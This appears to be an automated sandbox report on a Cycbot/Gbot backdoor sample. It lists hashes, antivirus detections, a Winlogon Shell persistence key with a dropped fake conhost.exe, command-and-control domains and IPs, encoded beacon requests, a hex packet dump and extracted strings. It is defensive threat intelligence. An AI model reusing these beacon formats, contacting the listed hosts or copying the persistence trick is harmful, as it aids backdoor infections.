Analysis Date2014-11-04 07:43:29
MD5aac3735132821fc53a31f3c01f4cae98
SHA112099e8cc316d42221801e79b536fb6a1730a44a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e13e054f581d225e28f93182a1b3d622 sha1: 5b29436466be2023186a5f332d4a84e4571904a7 size: 96768
Section.rdata md5: c87c0ee3690048f7ab7ec14aa3d7ab78 sha1: 730812582bd7f1f548176863fbeafc04675673ea size: 1536
Section.data md5: 9817fd5261d238eef76ada7db62d7ff0 sha1: b833713044fb4f9172d1011653d381544f5c3a56 size: 81408
Section.reloc md5: b3e6c00940579f3a174abebec7792035 sha1: 2f7e0d3f236cf443822155efd85acf1a3df6da44 size: 1024
Timestamp2005-11-28 17:44:26
PEhash961ae48f98737d84e8c5b04e9a5b383400bcbea2
IMPhashc0218d6cbe51d12b14c91cf7fec7295a
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/FraudSecurity.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-1493
AVDr. WebTrojan.DownLoader5.1690
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TQJ
AVFortinetW32/Kryptik.ISS!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Heur.Conjar.5
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.u
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanGen:Heur.Conjar.5
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen10
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)BScope.Cycbot.1213

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\conhost.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Program Files\Internet Explorer\lvvm.exe%C:\Program Files\Internet Explorer
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSonlinefilepanel.com
Winsock DNSonlinehelptoall.com
Winsock DNSonlineinstitute.com

Process
↳ C:\malware.exe startC:\Program Files\Internet Explorer\lvvm.exe%C:\Program Files\Internet Explorer

Creates ProcessC:\Program Files\Internet Explorer\lvvm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNSonlineinstitute.com
Type: A
67.227.195.200
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSonlinefilepanel.com
Type: A
DNSonlinehelptoall.com
Type: A
HTTP GEThttp://onlineinstitute.com/g7/images/logo.jpg?v4=16&tq=gJ4WK%2FSUh7TFlUR8oY%2BQtMWTUj26kJH7yZJSP7qVybhqtUn5CGFATA%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaS%2FT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f2e 6a70673f 76343d31 36267471   ogo.jpg?v4=16&tq
0x00000020 (00032)   3d674a34 574b2532 46535568 3754466c   =gJ4WK%2FSUh7TFl
0x00000030 (00048)   5552386f 59253242 51744d57 54556a32   UR8oY%2BQtMWTUj2
0x00000040 (00064)   366b4a48 37795a4a 53503771 56796268   6kJH7yZJSP7qVybh
0x00000050 (00080)   7174556e 35434746 41544125 33442533   qtUn5CGFATA%3D%3
0x00000060 (00096)   44204854 54502f31 2e300d0a 436f6e6e   D HTTP/1.0..Conn
0x00000070 (00112)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000080 (00128)   6f73743a 206f6e6c 696e6569 6e737469   ost: onlineinsti
0x00000090 (00144)   74757465 2e636f6d 0d0a4163 63657074   tute.com..Accept
0x000000a0 (00160)   3a202a2f 2a0d0a55 7365722d 4167656e   : */*..User-Agen
0x000000b0 (00176)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x000000c0 (00192)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53765425   ij%2B8yjYvEaSvT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a2020 3c2f626f 64793e0a   se....  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53765425   ij%2B82uYvEaSvT%
0x000000c0 (00192)   32427371 78537225 32466525 32425635   2BsqxSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42387976 55712532 4633766c   ij%2B8yvUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6564672e   1..Host: zonedg.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   206d6f7a 696c6c61 2f322e30 0d0a436f    mozilla/2.0..Co
0x00000100 (00256)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x00000110 (00272)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000120 (00288)   73650d0a 0d0a6e65 6374696f 6e3a2063   se....nection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42383275 59764561 53505425   ij%2B82uYvEaSPT%
0x000000c0 (00192)   32427371 70537225 32466525 32425635   2BsqpSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735350 54357775 67253242 74796766   VsSPT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384369 59764561 53253246   ij%2B8CiYvEaS%2F
0x000000c0 (00192)   54253242 73717469 3852704c 36666853   T%2Bsqti8RpL6fhS
0x000000d0 (00208)   72253246 65253242 56355a75 52672533   r%2Fe%2BV5ZuRg%3
0x000000e0 (00224)   44253344 20485454 502f312e 310d0a48   D%3D HTTP/1.1..H
0x000000f0 (00240)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000100 (00256)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000110 (00272)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000120 (00288)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000130 (00304)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000140 (00320)   0d0a                                  ..


Strings
.
.
.
.t.
.-0
.
.
j.

080904b0
1.0.0.1
1978
&Execute    Shift+E
FileVersion
PrivateBuild
ProductVersion
&shit menu
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
^^^@@@@@
<<<<<<<<
======
>>>>>;;;;;;;;;;
-------
;;;;;;;
;;;;;;;;```###
:::::::::::
!!_____________
///=====
///////
''''''
((((((((((
)))))))
{{{{{{{{
{{{{{{{{{{{{
@@@@@@@@@
@@@@@@@@@@
$$$$$$$$
$$$$$\
&|||||||||
&&&&&&&&&&&&&&&
######
########
%%%%%%%%%
+++++++++++++++
																		
[0O	3Yd
;1/h|+'0#?
1"wpkT6x	
1ynjO^
2222222222222
2$C'}#p
;>)2IA
-2Kiy8
2Njid>
2Pi#<C~
2\Q2])
2u+Jh%F
3333333333
-3\(5S
3(o+^8
3QY|"{
43xY@.I
#;4all
4A^}oKp
4t%{3-OSWDX}I
4u<b6W
4Y0[pd[
4z1`nNx
5555		
555555555ll
5ISN_21
5.(M%9
5YP-sk
66666666
66ooooooooooooooo
6d+0zm	V
6]K>i5~H	
@,6m0 .
6=PpXs\
[6um!},.
777777^^^^^^^\
[}7AZ?/
7H^u{w
84C6z,
88888NNN111
888qqqqqqqqqq&&DDDDDDDD
8CgOA4
%8d>s@-
:8SHI!I0
8V3#Ou
97WDBb
=====999999999999999
_____	99999999999999L
9AAAAA
9'gU]J
9pxL	3
9	tPmg
9U'q J
a0xZiO
AA..........
aaaaaa
;;;+AAAAAAAAAAA
ADVAPI32.dll
A={&mM
anB_Rg
%anu$J
@#A'SY\R
_b2#Bn(
B8m~fn
b^#9e2t&
bbbb//
bbbbbbb
bbbbbbbb
<<BBBBBBBBa
[[[BBEEEEE
\b%D3#
b[D>6x
'BFX}\xX
bhJ!Ef
bio)wD
b&Te3R
>c4*:iw
c98o7k
CA)E]<
CCCCC**
CCCCCCC
cccmmmmm
CM_Get_DevNode_Status
CMP_WaitNoPendingInstallEvents
Cpsy|C
CreateProcessW
CreateStdAccessibleObject
CUA26J
cz0SbH
D1B3L 
+D>/`9
@.data
&DjK{ 
d?Lz[,RD
|DM(	{@n
DP8W.s
D#`Qb a
dswyzf
dt\aAx}\a
D	Tc@7
dT#Uk%
duy>?GO+YD
.d{VqA
=%^ Dwx
dY*zOzq
e%%%%%%%%%%%%%%%
E6T{Np
EaK/XG
EEEEEE
EEEEEEE
EEEEEEEEEEEEEEEEEttt
EFAJ<,
<Eg[otN
EI>%<\
Ej)SE~
+eL9s-
EnumResourceNamesA
EnV<K|
eQ{0ip
ES%&|!3
Eyaq+S
eYYYYYYYYY
	?f7!!
fa6,4P
ffCCCCC
&&&FFF.....
FFFFFFFF
FFFFFFFFFFFFF
fHq?]d.E
Fhr]tWa
$fJW%JM4
Fo8l5]x
FX?<$=
"=G0:	D
GetACP
GetAtomNameW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentVariableW
GetLocaleInfoW
GetModuleHandleW
GetStartupInfoW
GetSystemTimeAsFileTime
GetThreadLocale
GetTickCount
Gfac!lL
GGGGGG
GGGGGGG
ggggggggg
ggggggggggggg
Gr%mQ4U
|H+^=^
H0000000{cccccc++++
'h2.dl
H_6SoS\
hb36h|
hCJrbq
Hdct}$
hh)))))))))
hhhhhh
HHHHHHH
hhyyyyyyyyyyyyyqqq
|HjY+D1(
$Hr; '
#H#_yVb
\HZ9BrI
h^\Z/=;r
#|[I~a
iiiiiAAAAAAAQ
iiiiiff[[[[[[[ 
I:mRvd
+i?>n0:
InstallCatalog
InterlockedCompareExchange
InterlockedExchange
IP:3yd
-i.PF;
IsDebuggerPresent
ITD0kD;
ITeu$r
IVX>6t
`:JI5g
JJJ6666666666
JJJJJJJ
\[J@m_
J}&<oB
>J'pp(
j+Spm%
JUl>Bs
jvn;}c
K"En%Y
KERNEL32.dll
K-f`|aQ
?k,Hh9
KKKGnnnnnnnn[       
KKKKiii
kkkkkk
klIGW#
Ko!MxxR_,
kq{nv\
'l3j2|
Lbk>I)
l[ddA6
lhhbyq
L|}jLIJ3
LocalAlloc
lpcjN=
l'@Pmt
LresultFromObject
lstrlenA
lstrlenW
l'z3p,
\M9>HE
	/mA*V
;	m>-b9
mciSendCommandA
MgDPEc,^
mgphd,
mk4D&Y
mmjjjjjjjjjj
{;;;;MMM
Mr<0Y_
{m=TY-
MultiByteToWideChar
n0"QOD
N55E_^
NdyuhJUgX
NNNNNNN
NNNNNNNN
NNNNNNNNN
nnnnnnnnnnnnCC
NNNNNNyyy
=NS30ji
]nVvOD
o0&UQPn
O}1mZ?
oe9;A<
oJlxS6
OLEACC
+o>LUY
oNSo#Y
oooFFFFFFFFFFF
ooooooo
OOOOOOO
OOOOOOO555
OOOOOOOO
OOOOOOOOOOO
ooooooooooor
o.TUMp
oWfcW9B
oX':mK
oxp7Rz
$=	!>_P
P0]G}d9
~P2{QCH
PathAddBackslashA
_PLSY{v
PPPPP~~~~
PPPPPP-----^^^^^^^
,,,,,,ppppppp
PPPPPPPPP
pppppppppppppppppppppp
PPPPUUUUUUUUUUUggg
:q-!1?]h4
qA5va?X
qF=G}aU
#Qgm,k
qqqq///
QQQQQQQ
qqqqqqqqqqqqqqqqq!!
QueryMemoryResourceNotification
QueryPerformanceCounter
/Q">y"
r\{3x(
RaiseException
`.rdata
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
Rf[GYf
\R`GXx
RiW,fB
R_ky9a
.....RRR
rrrr11111111
rrrrBBBBBBBBBBBB
rrrrrrrrrrr
rtOWjJ
'R@tyo
r#Y>cf
s &El,
SetUnhandledExceptionFilter
SETUPAPI.dll
SetupDiGetDeviceRegistryPropertyW
SF5Uy{
SHLWAPI.dll
sndPlaySoundA
spFCrK
srxAV+
sss~~~~~
.#Ss	S
SSSSSS
sssssss
ssssssss
SSSSSSSS
SSSSSSSSS
.ssssssssss
SSSSSSSSSSSS
TerminateProcess
!This program cannot be run in DOS mode.
tttttt
)))TTTTTTTTT
tttttYYYYY
U33333
U!C3!?
U^k(~t
UmAiKn
UnhandledExceptionFilter
(~UnVjM
UovSG b
[URp/Hp	T
u=S\4XT
'''uuuuu%
UUUUUUU
